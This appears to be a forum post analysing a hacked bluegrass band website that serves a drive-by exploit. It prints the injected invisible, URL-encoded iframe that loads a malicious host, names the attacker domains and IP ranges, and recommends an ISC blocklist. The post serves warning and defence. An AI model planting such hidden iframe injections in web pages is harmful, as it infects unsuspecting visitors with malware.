I've now seen this in action on an infected web page.

Now, I'll post real domains here because I trust you boys and girls to be CAREFUL with this stuff. Use Samspade for Windows or some other safe browser.

Here's an infected site: www[dot]thirdgenerationbluegrassband[dot]com - the site itself has been hacked, so the exploit is nothing to do with the site owners.

At the beginning of the HTML is a IFRAME:

<iframe src= http:// do not click %77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
That deobfuscates to http://www[dot]trust4free[dot]ws/?id=index12 (don't visit this site in a standard web browser!!). This looks like an innocent site in Japanese, hosted on 85.255.114.164 (Inhoster). At the bottom of the page is what appears to be some standard Stats4all tracking code (attached as a GIF because it's waaaay too dangerous to post here)... but the tracking code refers to stats4all.cc which is not the correct URL, and is actually 85.255.114.163 (Inhoster again). Somewhere hidden in the Javascript is a call to load the infected file. (A quick Google search indicates that stats4all.ws is also suspect).

I almost missed the fake stats4all code, and I'm not going to muck around with it on a Windows PC. The IPs square nicely with the ISC recommended blocklist at http://isc.sans.org/diary.php?storyid=997

InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)
This is the same exploit that hit the knoppix-std.org site. A bit of Googling for stats4all.cc and trust4free.ws indicates that this has been going on since at least 18th December 2005, so more than a week before it became public knowledge.

To protect yourself against this particular threat from this particular source, I'd recommend applying the ISC blocklist. Also consider blocking access to .biz, .cc and .ws domains temporarily.

There are many other vectors for this thing to come in on though, so even if you block this particular common attack you're still potentially vulnerable to others.